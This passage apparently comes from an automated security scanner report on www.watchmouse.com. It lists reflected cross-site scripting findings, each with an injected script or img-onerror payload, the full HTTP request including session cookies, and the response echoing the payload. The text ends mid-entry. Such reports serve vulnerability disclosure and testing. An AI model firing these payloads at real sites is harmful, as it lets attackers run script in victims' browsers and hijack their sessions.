The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91bd0"><img%20src%3da%20onerror%3dalert(1)>8cd577ee570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91bd0"><img src=a onerror=alert(1)>8cd577ee570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/terms.php/91bd0"><img%20src%3da%20onerror%3dalert(1)>8cd577ee570 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e95e8b5d9d62bac0bdc7c9a5fdda28ad"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>WatchMouse website monitoring service - Terms and Conditio
...[SNIP]...
<form method="post" name="91bd0"><img src=a onerror=alert(1)>8cd577ee570" action="91bd0">
...[SNIP]...

1.226. http://www.watchmouse.com/en/tos.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/tos.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d077"><script>alert(1)</script>63f0196ca1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3d077"><script>alert(1)</script>63f0196ca1/tos.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5b9361dfcf10b43866dbdd49520b19c3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en3d077"><script>alert(1)</script>63f0196ca1/tos.php" method="post">
...[SNIP]...

1.227. http://www.watchmouse.com/en/tos.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/tos.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a6ef"><script>alert(1)</script>100b5b603eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/tos.php6a6ef"><script>alert(1)</script>100b5b603eb HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f155f4d3201de5f3565439d306f7ba67"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/tos.php6a6ef"><script>alert(1)</script>100b5b603eb" method="post">
...[SNIP]...

1.228. http://www.watchmouse.com/en/tos.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b498e"><script>alert(1)</script>1c103de8a87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/tos.php?b498e"><script>alert(1)</script>1c103de8a87=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d5b4606118c0ab85a13a9aa8de3f356f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/tos.php?b498e"><script>alert(1)</script>1c103de8a87=1" method="post">
...[SNIP]...

1.229. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/traceroute.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5937"><script>alert(1)</script>798b3afc68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ena5937"><script>alert(1)</script>798b3afc68f/traceroute.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8e8eee740e1f5d9043d961b7955ba936"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ena5937"><script>alert(1)</script>798b3afc68f/traceroute.php" method="post">
...[SNIP]...

1.230. http://www.watchmouse.com/en/traceroute.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/traceroute.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97784"><script>alert(1)</script>1b33f12dfc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/traceroute.php97784"><script>alert(1)</script>1b33f12dfc7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8d664836a98a69cd1f2902360c30a205"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/traceroute.php97784"><script>alert(1)</script>1b33f12dfc7" method="post">
...[SNIP]...

1.231. http://www.watchmouse.com/en/traceroute.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/traceroute.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd126"><script>alert(1)</script>7ed75527df8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/traceroute.php?bd126"><script>alert(1)</script>7ed75527df8=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-7c39474f7a9e6a5c143544e00d65cbee"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/traceroute.php?bd126"><script>alert(1)</script>7ed75527df8=1" method="post">
...[SNIP]...

1.232. http://www.watchmouse.com/en/trial.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/trial.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ee1f"><script>alert(1)</script>c4f8fd7a77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9ee1f"><script>alert(1)</script>c4f8fd7a77/trial.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b26a3ebd922738c95c5fa02747267300"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9ee1f"><script>alert(1)</script>c4f8fd7a77/trial.php" method="post">
...[SNIP]...

1.233. http://www.watchmouse.com/en/trial.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/trial.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a67c4"><script>alert(1)</script>de71c530b36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/trial.phpa67c4"><script>alert(1)</script>de71c530b36 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9726f34eac231d9c8cf608d7fb5ff888"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/trial.phpa67c4"><script>alert(1)</script>de71c530b36" method="post">
...[SNIP]...

1.234. http://www.watchmouse.com/en/trial.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/trial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80035"><script>alert(1)</script>3fe5ce1010e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en/trial.php?80035"><script>alert(1)</script>3fe5ce1010e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-64696b75aa61c3586b2908839e32d72c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<a href="/nl/register.php?vpackid=35&80035"><script>alert(1)</script>3fe5ce1010e=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.235. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/website_monitoring_features.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d07f9"><script>alert(1)</script>fdd5fc632fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /end07f9"><script>alert(1)</script>fdd5fc632fb/website_monitoring_features.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b762b5a2672422c95cb79b9354845edc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/end07f9"><script>alert(1)</script>fdd5fc632fb/website_monitoring_features.php" method="post">
...[SNIP]...

1.236. http://www.watchmouse.com/en/website_monitoring_features.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/website_monitoring_features.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4c9"><script>alert(1)</script>2dee22711b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/website_monitoring_features.php4d4c9"><script>alert(1)</script>2dee22711b7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-24d89a88213296573e3c88f3622f22c7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/website_monitoring_features.php4d4c9"><script>alert(1)</script>2dee22711b7" method="post">
...[SNIP]...

1.237. http://www.watchmouse.com/en/website_monitoring_features.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/website_monitoring_features.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0866"><script>alert(1)</script>fe36ffcfa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/website_monitoring_features.php?d0866"><script>alert(1)</script>fe36ffcfa4=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b3775c05e35f70796f4c0188c85f92b2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/website_monitoring_features.php?d0866"><script>alert(1)</script>fe36ffcfa4=1" method="post">
...[SNIP]...

1.238. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/worldwide.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc509"><script>alert(1)</script>d40910ae5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /endc509"><script>alert(1)</script>d40910ae5f1/worldwide.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-202383e959579cead3e041f627fe4998"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/endc509"><script>alert(1)</script>d40910ae5f1/worldwide.php" method="post">
...[SNIP]...

1.239. http://www.watchmouse.com/en/worldwide.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/worldwide.php

Issue detail

